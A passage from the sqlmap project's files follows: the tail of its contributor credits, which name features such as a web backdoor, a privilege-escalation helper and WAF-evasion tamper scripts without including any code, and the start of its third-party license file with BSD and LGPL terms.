minor bug\n\nCesar Cerrudo, <cesar(at)argeniss.com>\n* for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf\n\nKarl Chen, <quarl(at)cs.berkeley.edu>\n* for contributing the initial multi-threading patch for the inference algorithm\n\nY P Chien, <ypchien(at)cox.net>\n* for reporting a minor bug\n\nPierre Chifflier, <pollux(at)debian.org> and Mark Hymers, <ftpmaster(at)debian.org>\n* for uploading and accepting the sqlmap Debian package to the official Debian project repository\n\nHysia Chow <hysia(at)icloud.com>\n* for contributing a couple of WAF scripts\n\nChris Clements, <cclements(at)flatearth.net>\n* for reporting a couple of bugs\n\nJohn Cobb, <johnc(at)nobytes.com>\n* for reporting a minor bug\n\nAndreas Constantinides, <megahz(at)megahz.org>\n* for reporting a minor bug\n\nAndre Costa, <andre.investorsclub(at)gmail.com>\n* for reporting a minor bug\n* for suggesting a minor enhancement\n\nUlises U. Cune, <ulises2k(at)gmail.com>\n* for reporting a bug\n\nAlessandro Curio, <alessandro.curio(at)gmail.com>\n* for reporting a minor bug\n\nAlessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>\n* for reporting a couple of bugs\n\nSherif El-Deeb, <archeldeeb(at)gmail.com>\n* for reporting a minor bug\n\nThomas Etrillard, <thomas.etrillard(at)synacktiv.com>\n* for contributing the IBM DB2 error-based payloads (RAISE_ERROR)\n\nStefano Di Paola, <stefano.dipaola(at)wisec.it>\n* for suggesting good features\n\nMosk Dmitri, <ya(at)darkbyte.ru>\n* for reporting a minor bug\n\nMeng Dong, <whenov(at)gmail.com>\n* for contributing a code for Waffit integration\n\nCarey Evans, <careye(at)spamcop.net>\n* for his fcrypt module that allows crypt(3) support\n    on Windows platforms\n\nShawn Evans, <shawndevans(at)gmail.com>\n* for suggesting an idea for one tamper script, greatest.py\n\nAdam Faheem, <faheem.adam(at)is.co.za>\n* for reporting a few bugs\n\nJames Fisher, <www(at)sittinglittleduck.com>\n* for contributing two very good feature requests\n* for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster\n\nJim Forster, <jimforster(at)goldenwest.com>\n* for reporting a bug\n\nRong-En Fan, <rafan(at)freebsd.org>\n* for committing the sqlmap 0.5 port to the official FreeBSD project repository\n\nGiorgio Fedon, <giorgio.fedon(at)gmail.com>\n* for suggesting a speed improvement for bisection algorithm\n* for reporting a bug when running against Microsoft SQL Server 2005\n\nKasper Fons, <thefeds(at)mail.dk>\n* for reporting several bugs\n\nAlan Franzoni, <alan.franzoni(at)gmail.com>\n* for helping out with Python subprocess library\n\nHarold Fry, <harold(at)violaceo.us>\n* for suggesting a minor enhancement\n\nDaniel G. Gamonal, <lgrecol(at)gmail.com>\n* for reporting a minor bug\n\nMarcos Mateos Garcia, <mmateos(at)germinus.com>\n* for reporting a minor bug\n\nAndrew Gecse, <andrew.gecse(at)upcmail.hu>\n* for reporting a minor issue\n\nIvan Giacomelli, <truemilk(at)insiberia.net>\n* for reporting a bug\n* for suggesting a minor enhancement\n* for reviewing the documentation\n\nDimitris Giannitsaros, <daremon(at)gmail.com>\n* for contributing a REST-JSON API client\n\nNico Golde, <nico(at)ngolde.de>\n* for reporting a couple of bugs\n\nOliver Gruskovnjak, <oliver.gruskovnjak(at)gmail.com>\n* for reporting a bug\n* for contributing a minor patch\n\nDavide Guerri, <d.guerri(at)caspur.it>\n* for suggesting an enhancement\n\nDan Guido, <dguido(at)gmail.com>\n* for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/\n\nDavid Guimaraes, <skysbsb(at)gmail.com>\n* for reporting considerable amount of bugs\n* for suggesting several features\n\nChris Hall, <chris.hall(at)mod10.net>\n* for coding the prettyprint.py library\n\nTate Hansen, <tate(at)clearnetsec.com>\n* for donating to sqlmap development\n\nMario Heiderich, <mario.heiderich(at)gmail.com>\nChristian Matthies, <ch0012(at)gmail.com>\nLars H. Strojny, <lars(at)strojny.net>\n* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, https://github.com/PHPIDS/PHPIDS\n\nKristian Erik Hermansen, <kristian.hermansen(at)gmail.com>\n* for reporting a bug\n* for donating to sqlmap development\n\nAlexander Hagenah, <ah(at)primepage.de>\n* for reporting a minor bug\n\nDennis Hecken, <mail(at)8dh.de>\n* for reporting a minor bug\n\nChoi Ho, <counterhacker815(at)gmail.com>\n* for reporting a minor bug\n\nJorge Hoya, <aquinadie(at)gmail.com>\n* for suggesting a minor enhancement\n\nWill Holcomb, <wholcomb(at)gmail.com>\n* for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code\n\nDaniel Huckmann, <sanitybit(at)gmail.com>\n* for reporting a couple of bugs\n\nDaliev Ilya, <daliser(at)yandex.ru>\n* for reporting a bug\n\nMehmet İnce, <mehmet(at)mehmetince.net>\n* for contributing a tamper script xforwardedfor.py\n\nJovon Itwaru, <jovon.itwaru(at)gmail.com>\n* for reporting a minor bug\n\nPrashant Jadhav, <prashantjadhav.82(at)gmail.com>\n* for reporting a bug\n\nDirk Jagdmann, <doj(at)cubic.org>\n* for reporting a typo in the documentation\n\nLuke Jahnke, <luke.jahnke(at)gmail.com>\n* for reporting a bug when running against MySQL < 5.0\n\nAndrew Kitis <andrew.kitis(at)gmail.com>\n* for contributing a tamper script lowercase.py\n\nDavid Klein, <david.klein(at)ipfocus.com.au>\n* for reporting a minor code improvement\n\nSven Klemm, <sven(at)c3d2.de>\n* for reporting two minor bugs with PostgreSQL\n\nAnant Kochhar, <anant.kochhar(at)secureyes.net>\n* for providing with feedback on the user's manual\n\nDmitriy Kononov, <dmitriyknnv(at)gmail.com>\n* for reporting a minor bug\n\nAlexander Kornbrust, <ak(at)red-database-security.com>\n* for reporting a couple of bugs\n\nKrzysztof Kotowicz, <kkotowicz(at)gmail.com>\n* for reporting a minor bug\n\nNicolas Krassas, <krasn(at)deventum.com>\n* for reporting a couple of bugs\n\nOliver Kuckertz, <oliver.kuckertz(at)mologie.de>\n* for contributing a minor patch\n\nAlex Landa, <landa.alex86(at)gmail.com>\n* for contributing a patch adding beta support for XML output\n\nGuido Landi, <lists(at)keamera.org>\n* for reporting a couple of bugs\n* for the great technical discussions\n* for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development\n* for presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009\n\nLee Lawson, <Lee.Lawson(at)dns.co.uk>\n* for reporting a minor bug\n\nJohn J. Lee, <jjl(at)pobox.com> and others\n* for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified\n\nNico Leidecker, <nico(at)leidecker.info>\n* for providing with feedback on a few features\n* for reporting a couple of bugs\n* for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip\n\nGabriel Lima, <pato(at)bugnet.com.br>\n* for reporting a couple of bugs\n\nSvyatoslav Lisin, <sel(at)3d-tech.ru>\n* for suggesting a minor feature\n\nMiguel Lopes, <theoverblue(at)gmail.com>\n* for reporting a minor bug\n\nTruong Duc Luong, <luongductruong(at)gmail.com>\n* for reporting a minor bug\n\nPavol Luptak, <pavol.luptak(at)nethemba.com>\n* for reporting a bug when injecting on a POST data parameter\n\nTill Maas, <opensource(at)till.name>\n* for suggesting a minor feature\n\nMichael Majchrowicz, <mmajchrowicz(at)gmail.com>\n* for extensively beta-testing sqlmap on various MySQL DBMS\n* for providing really appreciated feedback\n* for suggesting a lot of ideas and features\n\nVinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>\n* for contributing a Portuguese translation of README.md\n\nFrancesco Marano, <francesco.mrn24(at)gmail.com>\n* for contributing the Microsoft SQL Server/Sybase error-based - Stacking (EXEC) payload\n\nAhmad Maulana, <matdhule(at)gmail.com>\n* for contributing a tamper script halfversionedmorekeywords.py\n\nFerruh Mavituna, <ferruh(at)mavituna.com>\n* for exchanging ideas on the implementation of a couple of features\n\nDavid McNab, <david(at)conscious.co.nz>\n* for his XMLObject module that allows XML files to be operated on  like Python objects\n\nSpencer J. McIntyre, <smcintyre(at)securestate.com>\n* for reporting a minor bug\n* for contributing a patch for OS fingerprinting on DB2\n\nBrad Merrell, <bradmer12(at)gmail.com>\n* for reporting a minor bug\n\nMichael Meyer, <m.meyer2k(at)gmail.com>\n* for suggesting a minor feature\n\nEnrico Milanese, <enricomilanese(at)gmail.com>\n* for reporting a minor bug\n* for sharing some ideas for the PHP backdoor\n\nLiran Mimoni, <reactor.leet(at)gmail.com>\n* for reporting a minor bug\n\nMarco Mirandola, <mmmccc0(at)gmail.com>\n* for reporting a minor bug\n\nDevon Mitchell, <devon.mitchell1988(at)yahoo.com>\n* for reporting a minor bug\n\nAnton Mogilin, <azarmaster81(at)yahoo.com>\n* for reporting a few bugs\n\nSergio Molina, <smolina(at)wpr.es>\n* for reporting a minor bug\n\nAnastasios Monachos, <anastasiosm(at)gmail.com>\n* for providing some useful data\n* for suggesting a feature\n* for reporting a couple of bugs\n\nKirill Morozov, <l0rda(at)l0rda.biz>\n* for reporting a bug\n* for suggesting a feature\n\nAlejo Murillo Moya, <alex(at)65535.com>\n* for reporting a minor bug\n* for suggesting a few features\n\nYonny Mutai, <yonnym(at)googlemail.com>\n* for reporting a minor bug\n\nRoberto Nemirovsky, <roberto.paes(at)gmail.com>\n* for pointing out some enhancements\n\nSebastian Nerz, <sebastian.nerz(at)syss.de>\n* for reporting a (potential) vulnerability in --eval\n\nSimone Onofri, <simone.onofri(at)gmail.com>\n* for patching the PHP web backdoor to make it work properly also on Windows\n\nMichele Orru, <michele.orru(at)antisnatchor.com>\n* for reporting a couple of bug\n* for suggesting ideas on how to implement the RESTful API\n\nShaohua Pan, <pan(at)knownsec.com>\n* for reporting several bugs\n* for suggesting a few features\n\nAntonio Parata, <s4tan(at)ictsc.it>\n* for sharing some ideas for the PHP backdoor\n\nAdrian Pastor, <ap(at)gnucitizen.org>\n* for donating to sqlmap development\n\nChristopher Patten, <cpatten(at)sunera.com>\n* for reporting a bug in the blind SQL injection bisection algorithm\n\nZack Payton, <zack.payton(at)executiveinstruments.com>\n* for reporting a minor bug\n\nJaime Penalba, <nighterman(at)painsec.com>\n* for contributing a patch for INSERT/UPDATE generic boundaries\n\nPedrito Perez, <0ark1ang3l(at)gmail.com>\n* for reporting a couple of bugs\n\nBrandon Perry, <bperry.volatile(at)gmail.com>\n* for reporting a couple of bugs\n\nTravis Phillips, <perfect_insanity2004(at)yahoo.com>\n* for suggesting a minor enhancement\n\nMark Pilgrim, <mark(at)diveintomark.org>\n* for porting chardet package (Universal Encoding Detector) to Python\n\nSteve Pinkham, <steve.pinkham(at)gmail.com>\n* for suggesting a feature\n* for contributing a new SQL injection vector (MSSQL time-based blind)\n* for donating to sqlmap development\n\nAdam Pridgen, <adam.pridgen(at)gmail.com>\n* for suggesting some features\n\nLuka Pusic, <luka(at)pusic.si>\n* for reporting a couple of bugs\n\nOle Rasmussen, <olerass(at)gmail.com>\n* for reporting a bug\n* for suggesting a feature\n\nAlberto Revelli, <r00t(at)northernfortress.net>\n* for inspiring to write sqlmap user's manual in SGML\n* for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net\n\nDavid Rhoades, <david.rhoades(at)mavensecurity.com>\n* for reporting a bug\n\nAndres Riancho, <andres.riancho(at)gmail.com>\n* for beta-testing sqlmap\n* for reporting a bug and suggesting some features\n* for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net\n* for suggesting a way for handling DNS caching\n\nJamie Riden, <jamie.riden(at)ngssecure.com>\n* for reporting a minor bug\n\nAlexander Rigbo, <alex(at)rigbo.se>\n* for contributing a minor patch\n\nAntonio Riva, <antonio.riva(at)gmail.com>\n* for reporting a bug when running with python 2.5\n\nEthan Robish, <ethan.robish(at)gmail.com>\n* for reporting a bug\n\nLevente Rog, <levidos(at)gmail.com>\n* for reporting a minor bug\n\nAndrea Rossi, <andyroyalbattle(at)yahoo.it>\n* for reporting a minor bug\n* for suggesting a feature\n\nFrederic Roy, <frederic.roy(at)telindus.fr>\n* for reporting a couple of bugs\n\nVladimir Rutsky, <rutsky.vladimir(at)gmail.com>\n* for suggesting a couple of minor enhancements\n\nRichard Safran, <allapplyhere(at)yahoo.com>\n* for donating the sqlmap.org domain\n\nTomoyuki Sakurai, <cherry(at)trombik.org>\n* for submitting to the FreeBSD project the sqlmap 0.5 port\n\nRoberto Salgado, <lightos(at)gmail.com>\n* for contributing considerable amount of tamper scripts\n\nPedro Jacques Santos Santiago, <pedro__jacques(at)hotmail.com>\n* for reporting considerable amount of bugs\n\nMarek Sarvas, <marek.sarvas(at)gmail.com>\n* for reporting several bugs\n\nPhilippe A. R. Schaeffer, <schaeff(at)compuphil.de>\n* for reporting a minor bug\n\nHenri Salo <henri(at)nerv.fi>\n* for a donation\n\nMohd Zamiri Sanin, <zamiri.sanin(at)gmail.com>\n* for reporting a minor bug\n\nJorge Santos, <jorge_a_santos(at)hotmail.com>\n* for reporting a minor bug\n\nSven Schluter, <sschlueter(at)netzwerk.cc>\n* for contributing a patch\n* for waiting a number of seconds between each HTTP request\n\nRyan Sears, <rdsears(at)mtu.edu>\n* for suggesting a couple of enhancements\n* for donating to sqlmap development\n\nUemit Seren, <uemit.seren(at)gmail.com>\n* for reporting a minor adjustment when running with python 2.6\n\nShane Sewell, <ssewell(at)gmail.com>\n* for suggesting a feature\n\nAhmed Shawky, <ahmed(at)isecur1ty.org>\n* for reporting a major bug with improper handling of parameter values\n* for reporting a bug\n\nBrian Shura, <bshura(at)appsecconsulting.com>\n* for reporting a bug\n\nSumit Siddharth, <sid(at)notsosecure.com>\n* for sharing ideas on the implementation of a couple of features\n\nAndre Silva, <andreoaz(at)gmail.com>\n* for reporting a bug\n\nBenjamin Silva H. <silva96(at)gmail.com>\n* for reporting a bug\n\nDuarte Silva <duarte.silva(at)serializing.me>\n* for reporting a couple of bugs\n\nM Simkin, <mlsimkin(at)cox.net>\n* for suggesting a feature\n\nKonrads Smelkovs, <konrads(at)smelkovs.com>\n* for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server\n\nChris Spencer, <chris.spencer(at)ngssecure.com>\n* for reviewing the user's manual grammar\n\nMichael D. Stenner, <mstenner(at)linux.duke.edu>\n* for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections\n\nMarek Stiefenhofer, <m.stiefenhofer(at)r-tec.net>\n* for reporting a few bugs\n\nJason Swan, <jasoneswan(at)gmail.com>\n* for reporting a bug when enumerating columns on Microsoft SQL Server\n* for suggesting a couple of improvements\n\nChilik Tamir, <phenoman(at)gmail.com>\n* for contributing a patch for initial support SOAP requests\n\nAlessandro Tanasi, <alessandro(at)tanasi.it>\n* for extensively beta-testing sqlmap\n* for suggesting many features and reporting some bugs\n* for reviewing the documentation\n\nAndres Tarasco, <atarasco(at)gmail.com>\n* for contributing good feedback\n\nTom Thumb, <k1971(at)live.co.uk>\n* for reporting a major bug\n\nKazim Bugra Tombul, <mhackmail(at)gmail.com>\n* for reporting a minor bug\n\nEfrain Torres, <et(at)metasploit.com>\n* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository\n* for his great Metasploit WMAP Framework\n\nJennifer Torres, <jtorresf42(at)gmail.com>\n* for contributing a tamper script luanginx.py\n\nSandro Tosi, <matrixhasu(at)gmail.com>\n* for helping to create sqlmap Debian package correctly\n\nJacco van Tuijl, <jaccovantuijl(at)gmail.com>\n* for reporting several bugs\n\nVitaly Turenko, <dsu(at)dsu.com.ua>\n* for reporting a bug\n\nAugusto Urbieta, <x2xpy50(at)gmail.com>\n* for reporting a minor bug\n\nBedirhan Urgun, <bedirhanurgun(at)gmail.com>\n* for reporting a few bugs\n* for suggesting some features and improvements\n* for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench\n\nKyprianos Vasilopoulos, <kyprianos.vasilopoulos(at)gmail.com>\n* for reporting a couple of minor bugs\n\nVlado Velichkovski, <ketejadam(at)hotmail.com>\n* for reporting considerable amount of bugs\n* for suggesting an enhancement\n\nJohnny Venter, <johnny.venter(at)zoho.com>\n* for reporting a couple of bugs\n\nCarlos Gabriel Vergara, <carlosgabrielvergara(at)gmail.com>\n* for suggesting couple of good features\n\nPatrick Webster, <patrick(at)aushack.com>\n* for suggesting an enhancement\n* for donating to sqlmap development (from OSI.Security)\n\nEd Williams, <ed.williams(at)ngssecure.com>\n* for suggesting a minor enhancement\n\nAnthony Zboralski, <anthony.zboralski(at)bellua.com>\n* for providing with detailed feedback\n* for reporting a few minor bugs\n* for donating to sqlmap development\n\nThierry Zoller, <thierry(at)zoller.lu>\n* for reporting a couple of major bugs\n\nZhen Zhou, <zhouzhenster(at)gmail.com>\n* for suggesting a feature\n\n-insane-, <insane_(at)gmx.de>\n* for reporting a minor bug\n\n1ndr4 joe, <c0d3w4st3r(at)gmail.com>\n* for reporting a couple of bugs\n\nabc abc, <biedimc(at)gmx.net>\n* for reporting a minor bug\n\nAbuse 007, <abuse007(at)gmail.com>\n* for reporting a bug\n\nagix, <florian.gaultier@gmail.com>\n* for contributing the file upload via certutil.exe functionality\n\nAlex, <m3zero(at)gmail.com>\n* for reporting a minor bug\n\nanonymous anonymous, <tmp(at)2ch.so>\n* for reporting a couple of bugs\n\nbamboo, <roberthacksley(at)gmail.com>\n* for reporting a couple of bugs\n\nBrandon E., <brandonpoc(at)gmail.com>\n* for reporting a bug\n\nblack zero, <timeisflowing(at)gmail.com>\n* for reporting a minor bug\n\nblueBoy, <blueboy4444(at)gmail.com>\n* for reporting a bug\n\nbuawig, <buawig(at)gmail.com>\n* for reporting considerable amount of bugs\n\nBugtrace, <bugtrace(at)gmail.com>\n* for reporting several bugs\n\ncats, <dump(at)alcor.se>\n* for reporting a couple of bugs\n\nChristian S, <christian_s(at)linuxmail.org>\n* for reporting a minor bug\n\nclav, <elclav(at)gmail.com>\n* for reporting a minor bug\n\ndragoun dash, <dragoun.dash(at)gmail.com>\n* for reporting a minor bug\n\nflsf, <jianmaflsf@gmail.com>\n* for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py\n* for contributing a minor patch\n\nfufuh, <fufuh(at)users.sourceforge.net>\n* for reporting a bug when running on Windows\n\nHans Wurst, <wurstwass0r(at)googlemail.com>\n* for reporting a couple of bugs\n\nHysia, <hysia(at)huorui.net>\n* for contributing a Chinese translation of README.md\n\njames, <james(at)ev6.net>\n* for reporting a bug\n\nJoe \"Pragmatk\", <pragmatk(at)gmail.com>\n* for reporting a few bugs\n\nJohn Smith, <tixos(at)live.com>\n* for reporting several bugs\n* for suggesting some features\n\nm4l1c3, <malice.anon(at)gmail.com>\n* for reporting considerable amount of bugs\n\nmariano, <marianoso(at)gmail.com>\n* for reporting a bug\n\nmitchell, <mitchell(at)tufala.net>\n* for reporting a few bugs\n\nNadzree, <nadzree(at)bake180.com>\n* for reporting a minor bug\n\nnightman, <nightman(at)email.de>\n* for reporting considerable amount of bugs\n\nOso Dog osodog123(at)yahoo.com\n* for reporting a minor bug\n\npacman730, <pacman730(at)users.sourceforge.net>\n* for reporting a bug\n\npentestmonkey, <pentestmonkey(at)pentestmonkey.net>\n* for reporting several bugs\n* for suggesting a few minor enhancements\n\nPhat R., <phatthanaphol(at)gmail.com>\n* for reporting a few bugs\n\nPhil P, <(at)superevr>\n* for suggesting a minor enhancement\n\nragos, <ragos(at)joker.ms>\n* for reporting a minor bug\n\nrmillet, <rmillet42(at)gmail.com>\n* for reporting a bug\n\nRub3nCT, <rub3nct(at)gmail.com>\n* for reporting a minor bug\n\nsapra, <amanistaken(at)gmail.com>\n* for helping out with Python multiprocessing library on MacOS\n\nshiftzwei, <shiftzwei(at)gmail.com>\n* for reporting a couple of bugs\n\nsmith, <esmyl911(at)gmail.com>\n* for reporting a minor bug\n\nSoma Cruz, <oleg.kupreev(at)gmail.com>\n* for reporting a minor bug\n\nSpiros94, <cont(at)eyrhka.gr>\n* for contributing a Greek translation of README.md\n\nStuffe, <stuffe.dk(at)gmail.com>\n* for reporting a minor bug and a feature request\n\nSylphid, <sylphid.su(at)sti.com.tw>\n* for suggesting some features\n\nsyssecurity.info, <syssecurity7(at)googlemail.com>\n* for reporting a minor bug\n\nThis LittlePiggy, <thislittlepiggyhadroastbeef(at)hotmail.com>\n* for reporting a minor bug\n\nToR, <sstidus(at)email.it>\n* for reporting considerable amount of bugs\n* for suggesting a feature\n\nultramegaman, <seclists(at)ultramegaman.com>\n* for reporting a minor bug\n\nVinicius, <viniciusmaxdaloop(at)gmail.com>\n* for reporting a minor bug\n\nvirusdefender\n* for contributing WAF scripts safeline.py\n\nw8ay\n* for contributing an implementation for chunked transfer-encoding (switch --chunked)\n\nwanglei, <wanglei(at)17uxi.cn>\n* for reporting a minor bug\n\nwarninggp, <warninggp(at)gmail.com>\n* for reporting a few minor bugs\n\nx, <deep_freeze(at)mail.ru>\n* for reporting a bug\n\nzhouhx, <zhouhx(at)knownsec.com>\n* for contributing a minor patch\n\n# Organizations\n\nBlack Hat team, <info(at)blackhat.com>\n* for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation\n * Homepage: http://goo.gl/BKfs7\n * Slides: http://goo.gl/Dh65t\n * White paper: http://goo.gl/spX3N\n\nSOURCE Conference team, <press(at)sourceconference.com>\n* for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation\n * Homepage: http://goo.gl/IeXV4\n * Slides: http://goo.gl/OKnfj\n\nAthCon Conference team, <cfp(at)athcon.org>\n* for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation\n * Homepage: http://goo.gl/Fs71I\n * Slides: http://goo.gl/QMfjO\n\nMetasploit Framework development team, <msfdev(at)metasploit.com>\n* for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server\n * Homepage: http://www.metasploit.com\n\nOWASP Board, <info(at)owasp.org>\n* for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007\n * Homepage: http://www.owasp.org\n"
  },
  {
    "path": "sqlmap/doc/THIRD-PARTY.md",
    "content": "This file lists bundled packages and their associated licensing terms.\n\n# BSD\n\n* The `Ansistrm` library located under `thirdparty/ansistrm/`.\n  Copyright (C) 2010-2012, Vinay Sajip.\n* The `Beautiful Soup` library located under `thirdparty/beautifulsoup/`.\n  Copyright (C) 2004-2010, Leonard Richardson.\n* The `ClientForm` library located under `thirdparty/clientform/`.\n  Copyright (C) 2002-2007, John J. Lee.\n  Copyright (C) 2005, Gary Poster.\n  Copyright (C) 2005, Zope Corporation.\n  Copyright (C) 1998-2000, Gisle Aas.\n* The `Colorama` library located under `thirdparty/colorama/`.\n  Copyright (C) 2013, Jonathan Hartley.\n* The `Fcrypt` library located under `thirdparty/fcrypt/`.\n  Copyright (C) 2000, 2001, 2004 Carey Evans.\n* The `PrettyPrint` library located under `thirdparty/prettyprint/`.\n  Copyright (C) 2010, Chris Hall.\n* The `SocksiPy` library located under `thirdparty/socks/`.\n  Copyright (C) 2006, Dan-Haim.\n\n````\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n     - Redistributions of source code must retain the above copyright\n      notice, this list of conditions and the following disclaimer.\n     - Redistributions in binary form must reproduce the above copyright\n      notice, this list of conditions and the following disclaimer in the\n      documentation and/or other materials provided with the distribution.\n     - Neither the name of the <organization> nor the\n      names of its contributors may be used to endorse or promote products\n      derived from this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY\nDIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n````\n\n# LGPL\n\n* The `Chardet` library located under `thirdparty/chardet/`.\n  Copyright (C) 2008, Mark Pilgrim.\n* The `KeepAlive` library located under `thirdparty/keepalive/`.\n  Copyright (C) 2002-2003, Michael D. Stenner.\n* The `MultipartPost` library located under `thirdparty/multipart/`.\n  Copyright (C) 2006, Will Holcomb.\n* The `icmpsh` tool located under `extra/icmpsh/`.\n  Copyright (C) 2010, Nico Leidecker, Bernardo Damele.\n\n````\n                   GNU LESSER GENERAL PUBLIC LICENSE\n                       Version 3, 29 June 2007\n\n Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>\n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n\n  This version of the GNU Lesser General Public License incorporates\nthe terms and conditions of version 3 of the GNU General Public\nLicense, supplemented by the additional permissions listed below.\n\n  0. Additional Definitions.\n\n  As used herein, \"this License\" refers to version 3 of the GNU Lesser\nGeneral Public License, and the \"GNU GPL\" refers to version 3 of the GNU\nGeneral Public License.\n\n  \"The Library\" refers to a covered work governed by this License,\nother than an Application or a Combined Work as defined below.\n\n  An \"Application\" is any work that makes use of an interface provided\nby the Library, but which is not otherwise based on the Library.\nDefining a subclass of a class defined by the Library is deemed a mode\nof using an interface provided by the Library.\n\n  A \"Combined Work\" is a work produced by combining or linking an\nApplication with the Library.  The particular version of the Library\nwith which the Combined Work was made is also called the \"Linked\nVersion\".\n\n  The \"Minimal Corresponding Source\" for a Combined Work means the\nCorresponding Source for the Combined Work, excluding any source code\nfor portions of the Combined Work that, considered in isolation, are\nbased on the Application, and not on the Linked Version.\n\n  The \"Corresponding Application Code\" for a Combined Work means the\nobject code and/or source code for the Application, including any data\nand utility programs needed for reproducing the Combined Work from the\nApplication, but excluding the System Libraries of the Combined Work.\n\n  1. Exception to Section 3 of the GNU GPL.\n\n  You may convey a covered work under sections 3 and 4 of this License\nwithout being bound by section 3 of the GNU GPL.\n\n  2. Conveying Modified Versions.\n\n  If you modify a copy of the Library, and, in your modifications, a\nfacility refers to a function or data to be supplied by an Application\nthat uses the facility (other than as an argument passed when the\nfacility is invoked), then you may convey a copy of the modified\nversion:\n\n   a) under this License, provided that you make a good faith effort to\n   ensure that, in the event an Application does not supply the\n   function or data, the facility still operates, and performs\n   whatever part of its purpose remains meaningful, or\n\n   b) under the GNU GPL, with none of the additional permissions of\n   this License applicable to that copy.\n\n  3. Object Code Incorporating Material from Library Header Files.\n\n  The object code form of an Application may incorporate material from\na header file that is part of the Library.  You may convey such object\ncode under terms of your choice, provided that, if the incorporated\nmaterial is not limited to numerical parameters, data structure\nlayouts and accessors, or small macros, inline functions and templates\n(ten or fewer lines in length), you do both of the following:\n\n   a) Give prominent notice with each copy of the object code that the\n   Library is used in it and that the Library and its use are\n   covered by this License.\n\n   b) Accompany the object code with a copy of the GNU GPL and this license\n   document.\n\n  4. Combined Works.\n\n  You may convey a Combined Work under terms of your choice that,\ntaken together, effectively do not restrict modification of the\nportions of the Library contained in the Combined Work and reverse\nengineering for debugging such modifications, if you also do each of\nthe following:\n\n   a) Give prominent notice with each copy of the Combined Work that\n   the Library is used in it and that the Library and its use are\n   covered by this License.\n\n   b) Accompany the Combined Work with a copy of the GNU GPL and this license\n   document.\n\n   c) For a Combined Work that displays copyright notices during\n   execution, include the copyright notice for the Library among\n   these notices, as well as a reference directing the user to the\n   copies of the GNU GPL and this license document.\n\n   d) Do one of the following:\n\n       0) Convey the Minimal Corresponding Source under the terms of this\n       License, and the Corresponding Application Code in a form\n       suitable for, and under terms that permit, the user to\n       recombine or relink the Application with a modified version of\n       the Linked Version to produce a modified Combined Work, in the\n       manner specified by section 6 of the GNU GPL for conveying\n       Corresponding Source.\n\n       1) Use a suitable shared library mechanism for linking with the\n       Library.  A suitable mechanism is one that (a) uses at run time\n       a copy of the Library already present on the user's computer\n       system, and (b) will operate properly with a modified version\n       of the Library that is interface-compatible with the Linked\n       Version.\n\n   e) Provide Installation Information, but only if you would otherwise\n   be required to provide such information under section 6 of the\n   GNU GPL, and only to the extent that such information is\n   necessary to install and execute a modified version of the\n   Combined Work produced by recombining or relinking the\n   Application with a modified version of the Linked Version. (If\n   you use option 4d0, the Installation Information must accompany\n   the Minimal Corresponding Source and Corresponding Application\n   Code. If you use option 4d1, you must provide the Installation\n   Information in the manner specified by section 6 of the GNU GPL\n   for conveying Corresponding Source.)\n\n  5. Combined Libraries.\n\n  You may place library facilities that are a work based on 